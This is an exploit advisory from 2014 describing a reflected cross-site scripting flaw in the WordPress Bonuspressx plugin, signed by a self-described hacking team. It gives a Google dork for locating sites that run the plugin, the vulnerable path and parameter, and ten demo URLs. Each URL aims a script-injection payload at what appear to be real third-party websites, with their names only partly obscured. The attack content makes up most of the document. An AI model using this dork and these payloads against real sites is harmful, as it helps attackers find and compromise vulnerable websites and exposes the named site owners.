############################################
[+] Exploit Title : Wordpress Bonuspressx Plugin Cross Site Scripting
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://wordpress.org
[+] Google Dork : inurl:/wp-content/plugins/bonuspressx
[+] Date : 2014-04-23
[+] Tested on : Windows 7 , Mozilla FireFox
############################################
[+] Exploit : Cross Site Scripting
[+] Location : [Target]/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=[XSS]
############################################
[+] Demo :
# http://mXegabon.us/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# http://dXsimple.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# http://caXchkiemtienonline.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# http://mXarkcall.com/bonus/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# http://onlXCinekarrier.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# http://imhXoangtram.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# http://imXakingmoney.net/blog/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# http://seXnukeinferno.com//wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# http://eXmarky.net/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# http://viraloXptins.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
############################################
Discovered By : Milad Hacking & Cyber Injector
We Love Mohammad
Mail : milad.hacking.blackhat@gmail.com
Home Page : https://www.facebook.com/milad.hacking.5
############################################